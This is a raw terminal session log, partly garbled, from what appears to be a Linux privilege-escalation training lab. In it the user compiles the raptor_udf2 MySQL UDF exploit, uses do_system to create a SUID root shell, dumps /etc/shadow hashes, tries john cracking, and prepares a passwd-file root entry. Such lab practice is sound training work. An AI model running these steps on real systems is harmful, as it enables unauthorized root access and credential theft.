100:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
2 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
300:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
4 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
500:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
6 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
700:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
900:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
10 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
1100:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
1300:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
14 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
1500:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
16 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
17^Cssh user@10.10.170.166
23Owner@DESKTOP-8DUSIOO ~
24$ ssh user@10.10.170.166
25ssh: connect to host 10.10.170.166 port 22: Connection timed out
26
27Owner@DESKTOP-8DUSIOO ~
28$ ssh 10.10.170.166
29The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
30blished.
31RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
32Ank.
33Are you sure you want to continue connecting (yes/no)? yes
34Warning: Permanently added '10.10.170.166' (RSA) to the list of known
35Owner@DESKTOP-8DUSIOO ~
36$ ssh 10.10.170.166
37The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
38RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
39Are you sure you want to continue connecting (yes/no)? yes
40Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
41owner@10.10.170.166's password:
42Permission denied, please try again.
43owner@10.10.170.166's password:
44Permission denied, please try again.
45owner@10.10.170.166's password:
46$ ssh 10.10.170.1666K0s
47Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
48$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
49ame 10.10.170.166:22: No such host is known.
50Owner@DESKTOP-8DUSIOO ~
51Owner@DESKTOP-8DUSIOO ~6 22
52$ 6 22
53ser@10user@10.10.170.166's passwor
54d:
55bash: 22: command not found
56Owner@DESKTOP-8DUSIOO ~
57Owner@DESKTOP-8DUSIOO ~6 22
58$ 6 220.10.170.1
5966's puser@10.10.170.166's password:
60owner@10.10.170.166's password:
61user@10.10.170.166's password:
62Owner@DESKTOP-8DUSIOO ~ound
63$ ssh 10.10.Ku
64Owner@DESKTOP- ~
65Owner@DESKTOP-8DUSIOO ~
66$ ssh user@10.10.170.166 22
67user@10.10.170.166's password:
68bash: 22: command not found
69bash: 22: command not found
70Owner@DESKTOP-8DUSIOO ~
71$ ssh user@10.10.170.166
72$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
73password:
74Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
75
76The programs included with the Debian GNU/Linux system are free software;
77the exact distribution terms for each program are described in the
78individual files in /usr/share/doc/*/copyright.
79
80Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
81permitted by applicable law.
82Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
83user@debian:~$ id
84uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
85dev)
86user@debian:~$ ls
87myvpn.ovpn tools
88user@debian:~$ cd tools/
89user@debian:~/tools$ ls
90kernel-exploits mysql-udf nginx privesc-scripts sudo suid
91user@debian:~/tools$ cd mysql-udf/
92user@debian:~/tools/mysql-udf$ ls
93raptor_udf2.c
94user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
95user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
96.o -lc
97top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
98Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
99Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
100Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
101Swap: 901112k total, 0k used, 901112k free, 54236k cached
102
103 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
104 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
105 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
106 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
107 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
108 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
109 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
110 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
111 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
112 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
113 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
114 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
115 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
116 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
117 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
118 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
119 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
120 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
121 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
122 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
123 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
124 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
125 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
126 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
127 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
128 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
129 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
130 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
131 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
132 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
133 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
134 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
135 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
136 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
137 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
138 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
139 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
140 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
141 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
142 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
143 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
144 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
145 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
146 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
147 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
148 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
149 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
150 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
151 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
152 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
153 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
154 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
155 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
156user@debian:~/tools/mysql-udf$ use mysql;
157-bash: use: command not found
158user@debian:~/tools/mysql-udf$ mysql -u root
159Welcome to the MySQL monitor. Commands end with ; or \g.
160Your MySQL connection id is 36
161Server version: 5.1.73-1+deb6u1 (Debian)
162
163Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
164
165Oracle is a registered trademark of Oracle Corporation and/or its
166affiliates. Other names may be trademarks of their respective
167owners.
168
169Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
170
171mysql> use mysql;
172Reading table information for completion of table and column names
173You can turn off this feature to get a quicker startup with -A
174
175Database changed
176mysql> create table foo(line blob);
177Query OK, 0 rows affected (0.00 sec)
178
179mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
180Query OK, 1 row affected (0.00 sec)
181
182mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
183Query OK, 1 row affected (0.00 sec)
184
185mysql> create function do_system returns integer soname 'raptor_udf2.so';
186Query OK, 0 rows affected (0.00 sec)
187
188mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
189+------------------------------------------------------------------+
190| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
191+------------------------------------------------------------------+
192| 0 |
193+------------------------------------------------------------------+
1941 row in set (0.00 sec)
195
196mysql> /q
197 -> exit
198 -> /quit
199 -> ^CCtrl-C -- exit!
200Aborted
201user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
202rootbash-4.1# id
203uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
204(dip),44(video),46(plugdev),1000(user)
205rootbash-4.1# cat /etc/shadow
206root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
20717298:0:99999:7:::
208daemon:*:17298:0:99999:7:::
209bin:*:17298:0:99999:7:::
210sys:*:17298:0:99999:7:::
211sync:*:17298:0:99999:7:::
212games:*:17298:0:99999:7:::
213man:*:17298:0:99999:7:::
214lp:*:17298:0:99999:7:::
215mail:*:17298:0:99999:7:::
216news:*:17298:0:99999:7:::
217uucp:*:17298:0:99999:7:::
218proxy:*:17298:0:99999:7:::
219www-data:*:17298:0:99999:7:::
220backup:*:17298:0:99999:7:::
221list:*:17298:0:99999:7:::
222irc:*:17298:0:99999:7:::
223gnats:*:17298:0:99999:7:::
224nobody:*:17298:0:99999:7:::
225libuuid:!:17298:0:99999:7:::
226Debian-exim:!:17298:0:99999:7:::
227sshd:*:17298:0:99999:7:::
228user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
22917298:0:99999:7:::
230statd:*:17299:0:99999:7:::
231mysql:!:18133:0:99999:7:::
232rootbash-4.1# cat /etc/passwd
233root:x:0:0:root:/root:/bin/bash
234daemon:x:1:1:daemon:/usr/sbin:/bin/sh
235bin:x:2:2:bin:/bin:/bin/sh
236sys:x:3:3:sys:/dev:/bin/sh
237sync:x:4:65534:sync:/bin:/bin/sync
238games:x:5:60:games:/usr/games:/bin/sh
239man:x:6:12:man:/var/cache/man:/bin/sh
240lp:x:7:7:lp:/var/spool/lpd:/bin/sh
241mail:x:8:8:mail:/var/mail:/bin/sh
242news:x:9:9:news:/var/spool/news:/bin/sh
243uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
244proxy:x:13:13:proxy:/bin:/bin/sh
245www-data:x:33:33:www-data:/var/www:/bin/sh
246backup:x:34:34:backup:/var/backups:/bin/sh
247list:x:38:38:Mailing List Manager:/var/list:/bin/sh
248irc:x:39:39:ircd:/var/run/ircd:/bin/sh
249gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
250nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
251libuuid:x:100:101::/var/lib/libuuid:/bin/sh
252Debian-exim:x:101:103::/var/spool/exim4:/bin/false
253sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
254user:x:1000:1000:user,,,:/home/user:/bin/bash
255statd:x:103:65534::/var/lib/nfs:/bin/false
256mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
257rootbash-4.1# cat /etc/hosts
258127.0.0.1 localhost
259127.0.1.1 debian.localdomain debian
260
261# The following lines are desirable for IPv6 capable hosts
262::1 ip6-localhost ip6-loopback
263fe00::0 ip6-localnet
264ff00::0 ip6-mcastprefix
265ff02::1 ip6-allnodes
266ff02::2 ip6-allrouters
267rootbash-4.1# ls -l /etc/shadow
268-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
269rootbash-4.1# cat /etc/shadow
270root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
27117298:0:99999:7:::
272daemon:*:17298:0:99999:7:::
273bin:*:17298:0:99999:7:::
274sys:*:17298:0:99999:7:::
275sync:*:17298:0:99999:7:::
276games:*:17298:0:99999:7:::
277man:*:17298:0:99999:7:::
278lp:*:17298:0:99999:7:::
279mail:*:17298:0:99999:7:::
280news:*:17298:0:99999:7:::
281uucp:*:17298:0:99999:7:::
282proxy:*:17298:0:99999:7:::
283www-data:*:17298:0:99999:7:::
284backup:*:17298:0:99999:7:::
285list:*:17298:0:99999:7:::
286irc:*:17298:0:99999:7:::
287gnats:*:17298:0:99999:7:::
288nobody:*:17298:0:99999:7:::
289libuuid:!:17298:0:99999:7:::
290Debian-exim:!:17298:0:99999:7:::
291sshd:*:17298:0:99999:7:::
292user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
29317298:0:99999:7:::
294statd:*:17299:0:99999:7:::
295mysql:!:18133:0:99999:7:::
296rootbash-4.1# wget
297wget: missing URL
298Usage: wget [OPTION]... [URL]...
299
300Try ‘wget --help’ for more options.
301rootbash-4.1# pwd
302/home/user/tools/mysql-udf
303rootbash-4.1# ls
304raptor_udf2.c raptor_udf2.o raptor_udf2.so
305rootbash-4.1# cd ..
306rootbash-4.1# ls
307kernel-exploits mysql-udf nginx privesc-scripts sudo suid
308rootbash-4.1# cd ..
309rootbash-4.1# ls
310myvpn.ovpn tools
311rootbash-4.1# cd tools/
312rootbash-4.1# ls
313kernel-exploits mysql-udf nginx privesc-scripts sudo suid
314rootbash-4.1# cd privesc-scripts/
315rootbash-4.1# ls
316LinEnum.sh linpeas.sh lse.sh
317rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
318login as: user
319user@10.10.170.166's password:
320Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
321
322The programs included with the Debian GNU/Linux system are free software;
323the exact distribution terms for each program are described in the
324individual files in /usr/share/doc/*/copyright.
325
326Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
327permitted by applicable law.
328Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
329user@debian:~$ cd /home/user/tools/mysql.udf
330-bash: cd: /home/user/tools/mysql.udf: No such file or directory
331user@debian:~$ ls
332myvpn.ovpn tools
333user@debian:~$ cd tools/
334user@debian:~/tools$ ls
335kernel-exploits mysql-udf nginx privesc-scripts sudo suid
336user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
337gcc: raptor_udf2.c: No such file or directory
338gcc: no input files
339user@debian:~/tools$ cd mysql-udf/
340user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
341user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
342gcc: unrecognized option '-soname,'
343gcc: unrecognized option '-1c'
344user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
345gcc: unrecognized option '-soname,'
346user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
347user@debian:~/tools/mysql-udf$ mysql -u root
348Welcome to the MySQL monitor. Commands end with ; or \g.
349Your MySQL connection id is 37
350Server version: 5.1.73-1+deb6u1 (Debian)
351
352Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
353
354Oracle is a registered trademark of Oracle Corporation and/or its
355affiliates. Other names may be trademarks of their respective
356owners.
357
358Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
359
360mysql> use mysql;
361Reading table information for completion of table and column names
362You can turn off this feature to get a quicker startup with -A
363
364Database changed
365mysql> create table bmillakid(line blob);
366Query OK, 0 rows affected (0.00 sec)
367
368mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
369Query OK, 1 row affected (0.00 sec)
370
371mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
372ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
373mysql> exit
374Bye
375user@debian:~/tools/mysql-udf$ who am i
376user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
377user@debian:~/tools/mysql-udf$ links
378-bash: links: command not found
379user@debian:~/tools/mysql-udf$ lynx
380-bash: lynx: command not found
381user@debian:~/tools/mysql-udf$ wget
382wget: missing URL
383Usage: wget [OPTION]... [URL]...
384
385Try ‘wget --help’ for more options.
386user@debian:~/tools/mysql-udf$ cat /etc/shadow
387root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
388daemon:*:17298:0:99999:7:::
389bin:*:17298:0:99999:7:::
390sys:*:17298:0:99999:7:::
391sync:*:17298:0:99999:7:::
392games:*:17298:0:99999:7:::
393man:*:17298:0:99999:7:::
394lp:*:17298:0:99999:7:::
395mail:*:17298:0:99999:7:::
396news:*:17298:0:99999:7:::
397uucp:*:17298:0:99999:7:::
398proxy:*:17298:0:99999:7:::
399www-data:*:17298:0:99999:7:::
400backup:*:17298:0:99999:7:::
401list:*:17298:0:99999:7:::
402irc:*:17298:0:99999:7:::
403gnats:*:17298:0:99999:7:::
404nobody:*:17298:0:99999:7:::
405libuuid:!:17298:0:99999:7:::
406Debian-exim:!:17298:0:99999:7:::
407sshd:*:17298:0:99999:7:::
408user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
409statd:*:17299:0:99999:7:::
410mysql:!:18133:0:99999:7:::
411bmillakid:!:18645:0:99999:7:::
412user@debian:~/tools/mysql-udf$ cat /etc/passwd
413root:x:0:0:root:/root:/bin/bash
414daemon:x:1:1:daemon:/usr/sbin:/bin/sh
415bin:x:2:2:bin:/bin:/bin/sh
416sys:x:3:3:sys:/dev:/bin/sh
417sync:x:4:65534:sync:/bin:/bin/sync
418games:x:5:60:games:/usr/games:/bin/sh
419man:x:6:12:man:/var/cache/man:/bin/sh
420lp:x:7:7:lp:/var/spool/lpd:/bin/sh
421mail:x:8:8:mail:/var/mail:/bin/sh
422news:x:9:9:news:/var/spool/news:/bin/sh
423uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
424proxy:x:13:13:proxy:/bin:/bin/sh
425www-data:x:33:33:www-data:/var/www:/bin/sh
426backup:x:34:34:backup:/var/backups:/bin/sh
427list:x:38:38:Mailing List Manager:/var/list:/bin/sh
428irc:x:39:39:ircd:/var/run/ircd:/bin/sh
429gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
430nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
431libuuid:x:100:101::/var/lib/libuuid:/bin/sh
432Debian-exim:x:101:103::/var/spool/exim4:/bin/false
433sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
434user:x:1000:1000:user,,,:/home/user:/bin/bash
435statd:x:103:65534::/var/lib/nfs:/bin/false
436mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
437bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
438user@debian:~/tools/mysql-udf$ ls -la user
439ls: cannot access user: No such file or directory
440user@debian:~/tools/mysql-udf$ pwd
441/home/user/tools/mysql-udf
442user@debian:~/tools/mysql-udf$ who am i
443user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
444user@debian:~/tools/mysql-udf$ whoami
445user
446user@debian:~/tools/mysql-udf$ ls -la /
447total 96
448drwxr-xr-x 22 root root 4096 Aug 25 2019 .
449drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
450drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
451drwxr-xr-x 3 root root 4096 May 12 2017 boot
452drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
453drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
454drwxr-xr-x 3 root root 4096 May 15 2017 home
455lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
456drwxr-xr-x 12 root root 12288 May 14 2017 lib
457lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
458drwx------ 2 root root 16384 May 12 2017 lost+found
459drwxr-xr-x 3 root root 4096 May 12 2017 media
460drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
461drwxr-xr-x 2 root root 4096 May 12 2017 opt
462dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
463drwx------ 5 root root 4096 May 15 2020 root
464drwxr-xr-x 2 root root 4096 May 13 2017 sbin
465drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
466drwxr-xr-x 2 root root 4096 May 12 2017 srv
467drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
468drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
469drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
470drwxr-xr-x 11 root root 4096 May 13 2017 usr
471drwxr-xr-x 14 root root 4096 May 13 2017 var
472lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
473user@debian:~/tools/mysql-udf$ whoami
474user
475user@debian:~/tools/mysql-udf$ sudo -l
476Matching Defaults entries for user on this host:
477 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
478
479User user may run the following commands on this host:
480 (root) NOPASSWD: /usr/sbin/iftop
481 (root) NOPASSWD: /usr/bin/find
482 (root) NOPASSWD: /usr/bin/nano
483 (root) NOPASSWD: /usr/bin/vim
484 (root) NOPASSWD: /usr/bin/man
485 (root) NOPASSWD: /usr/bin/awk
486 (root) NOPASSWD: /usr/bin/less
487 (root) NOPASSWD: /usr/bin/ftp
488 (root) NOPASSWD: /usr/bin/nmap
489 (root) NOPASSWD: /usr/sbin/apache2
490 (root) NOPASSWD: /bin/more
491user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
492root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
493user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
494-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
495user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
496Warning: truncating password to 8 characters
4975v3Bvw7Nf6Zbs
498user@debian:~/tools/mysql-udf$
499user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
500-bash: 5v3Bvw7Nf6Zbs: command not found
501user@debian:~/tools/mysql-udf$ nano /etc/passwd
502user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
503rootbash-4.1# su newroot
504Unknown id: newroot
505rootbash-4.1# whoami
506root
507rootbash-4.1# cat /etc/passwd
508root:x:0:0:root:/root:/bin/bash
509daemon:x:1:1:daemon:/usr/sbin:/bin/sh
510bin:x:2:2:bin:/bin:/bin/sh
511sys:x:3:3:sys:/dev:/bin/sh
512sync:x:4:65534:sync:/bin:/bin/sync
513games:x:5:60:games:/usr/games:/bin/sh
514man:x:6:12:man:/var/cache/man:/bin/sh
515lp:x:7:7:lp:/var/spool/lpd:/bin/sh
516mail:x:8:8:mail:/var/mail:/bin/sh
517news:x:9:9:news:/var/spool/news:/bin/sh
518uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
519proxy:x:13:13:proxy:/bin:/bin/sh
520www-data:x:33:33:www-data:/var/www:/bin/sh
521backup:x:34:34:backup:/var/backups:/bin/sh
522list:x:38:38:Mailing List Manager:/var/list:/bin/sh
523irc:x:39:39:ircd:/var/run/ircd:/bin/sh
524gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
525nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
526libuuid:x:100:101::/var/lib/libuuid:/bin/sh
527Debian-exim:x:101:103::/var/spool/exim4:/bin/false
528sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
529user:x:1000:1000:user,,,:/home/user:/bin/bash
530statd:x:103:65534::/var/lib/nfs:/bin/false
531mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
532bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
533rootbash-4.1# su root
534Password:
535su: Authentication failure
536rootbash-4.1# exit
537exit
538user@debian:~/tools/mysql-udf$ sudo -l
539Matching Defaults entries for user on this host:
540 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
541
542User user may run the following commands on this host:
543 (root) NOPASSWD: /usr/sbin/iftop
544 (root) NOPASSWD: /usr/bin/find
545 (root) NOPASSWD: /usr/bin/nano
546 (root) NOPASSWD: /usr/bin/vim
547 (root) NOPASSWD: /usr/bin/man
548 (root) NOPASSWD: /usr/bin/awk
549 (root) NOPASSWD: /usr/bin/less
550 (root) NOPASSWD: /usr/bin/ftp
551 (root) NOPASSWD: /usr/bin/nmap
552 (root) NOPASSWD: /usr/sbin/apache2
553 (root) NOPASSWD: /bin/more
554user@debian:~/tools/mysql-udf$ cat /etc/crontab
555# /etc/crontab: system-wide crontab
556# Unlike any other crontab you don't have to run the `crontab'
557# command to install the new version when you edit this file
558# and files in /etc/cron.d. These files also have username fields,
559# that none of the other crontabs do.
560
561SHELL=/bin/sh
562PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
563
564# m h dom mon dow user command
56517 * * * * root cd / && run-parts --report /etc/cron.hourly
56625 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
56747 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
